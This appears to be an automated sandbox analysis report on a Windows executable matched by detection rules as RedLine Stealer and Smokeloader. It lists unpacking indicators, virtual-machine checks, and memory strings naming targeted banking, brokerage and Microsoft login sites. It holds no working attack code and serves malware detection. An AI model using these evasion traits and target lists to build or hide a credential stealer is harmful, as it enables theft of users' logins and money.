Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02136AB7	0_2_02136AB7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02149AA7	0_2_02149AA7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216BAD7	0_2_0216BAD7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02147AE4	0_2_02147AE4
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02138AE7	0_2_02138AE7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02133B67	0_2_02133B67
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02163B97	0_2_02163B97
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02169B8A	0_2_02169B8A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02141BB6	0_2_02141BB6
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216C807	0_2_0216C807
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02166877	0_2_02166877
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02137887	0_2_02137887
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214A8F7	0_2_0214A8F7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214F937	0_2_0214F937
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_021399F7	0_2_021399F7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215EE1A	0_2_0215EE1A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215BE07	0_2_0215BE07
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215EE08	0_2_0215EE08
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215DE57	0_2_0215DE57
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02144E87	0_2_02144E87
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216AF17	0_2_0216AF17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214DF17	0_2_0214DF17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215FF23	0_2_0215FF23
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02164F56	0_2_02164F56
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02165F7A	0_2_02165F7A
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02172F87	0_2_02172F87
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02150FF7	0_2_02150FF7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02147FFA	0_2_02147FFA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213EC17	0_2_0213EC17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02172CC7	0_2_02172CC7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213CCC9	0_2_0213CCC9
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215ECC9	0_2_0215ECC9
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02135D17	0_2_02135D17
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0214DD37	0_2_0214DD37
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02132D87	0_2_02132D87
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02162D8B	0_2_02162D8B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0216CDA7	0_2_0216CDA7
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02167DD0	0_2_02167DD0
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215EDC6	0_2_0215EDC6

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: String function: 02144E77 appears 116 times
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: String function: 00408170 appears 45 times
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: String function: 021383D7 appears 77 times

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820

Source: uU6IvUPN39.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1539359212.00000000006AA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: uU6IvUPN39.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_006AAF5E CreateToolhelp32Snapshot,Module32First,

0_2_006AAF5E

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_0043B870

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2960

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2a21b7fc-5800-49ca-baca-6863053e20d7

Jump to behavior

Source: uU6IvUPN39.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: uU6IvUPN39.exe, 00000000.00000003.1441997488.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1441889021.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1453499032.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000003.1453649979.0000000002F43000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: uU6IvUPN39.exe	Virustotal: Detection: 56%
Source: uU6IvUPN39.exe	ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

File read: C:\Users\user\Desktop\uU6IvUPN39.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\uU6IvUPN39.exe "C:\Users\user\Desktop\uU6IvUPN39.exe"
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 1820

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Unpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xidorow:W;.xiko:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Unpacked PE file: 0.2.uU6IvUPN39.exe.400000.0.unpack

Source: uU6IvUPN39.exe	Static PE information: section name: .xidorow
Source: uU6IvUPN39.exe	Static PE information: section name: .xiko

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	0_2_00441853
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_006AF8E2 pushad ; ret	0_2_006AF8E3
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_006AF94D pushfd ; ret	0_2_006AF94E
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_006AD90E push ebx; ret	0_2_006AD90F
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_006AE4B6 push esi; retn 001Ch	0_2_006AE4BA
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0215B05A push ebp; iretd	0_2_0215B05D
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02171AB7 push eax; mov dword ptr [esp], 0E0908DBh	0_2_02171ABA

Source: uU6IvUPN39.exe

Static PE information: section name: .text entropy: 7.410598344406821

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe TID: 5272

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: uU6IvUPN39.exe, 00000000.00000003.1453085224.0000000002F46000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.4.dr	Binary or memory string: VMware
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.4.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.00000000006E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.4.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.4.dr	Binary or memory string: vmci.sys
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.4.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.dr	Binary or memory string: VMware VMCI Bus Device
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.4.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.4.dr	Binary or memory string: VMware Virtual USB Mouse
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.4.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.4.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: uU6IvUPN39.exe, 00000000.00000003.1440748963.000000000072E000.00000004.00000020.00020000.00000000.sdmp, uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.4.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.4.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.4.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.4.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: uU6IvUPN39.exe, 00000000.00000003.1453219559.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
